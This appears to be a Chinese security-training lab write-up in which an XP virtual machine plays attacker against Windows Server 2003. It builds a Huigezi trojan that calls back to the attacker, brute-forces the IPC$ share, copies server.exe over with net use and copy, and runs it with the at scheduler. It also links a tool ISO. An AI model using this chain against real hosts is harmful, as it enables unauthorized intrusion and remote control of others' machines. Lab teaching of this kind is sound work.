一、环境介绍
1、虚拟机软件 VMware V12.0版本
2、虚拟机
3、工具 WindowsXP----模拟黑客攻击机 Windows server 2003----模拟被木马控制方 灰鸽子软件 NTscan 以上2个工具均已在"安全素材.iso"中提供。
(安全素材.iso:https://wwt.lanzoum/iqRWC09b7fib 密码:eo2f)
二、实验流程
1.开启虚拟机 开启xp与2003共2台虚拟机,开机,并桥接到vmnet 1上。
(若两台虚拟机不再同一模式下则无法互相ping通,也无法进行通信)
2.将安全素材.iso导入到xp中,选中镜像后勾选已连接。
3.使用灰鸽子制作木马,将木马放在D盘
制作过程:
(1)点击配置服务程序
(2)自动上线设置中的IP填写攻击端的IP,在这里就是xp的IP,因为将木马种植到其他电脑上时,木马需要知道将返回信息传给谁
(3)制作完成后保存到D盘即可
4.IPC$暴力破解
生成密码字典,然后使用NTscan工具,设置破解IP地址范围,选择IPC$,点击start
5.与目标主机建立IPC$
net use \\10.1.1.2\ipc$ 密码 /user:用户名
6.植入木马到目标主机
copy server.exe \\10.1.1.2\d$
注意这里是d$,因为在dos窗口下输入net share查看发现磁盘的共享名是d$
7.设置目标主机运行木马
net time \\10.1.1.2
at \\10.1.1.2 17:17 d:\server.exe
8.成功控制目标主机
观察目标主机已自动上线,已可以进行监控或传输数据等操作。
更多推荐
信息安全实训——神奇的木马
发布评论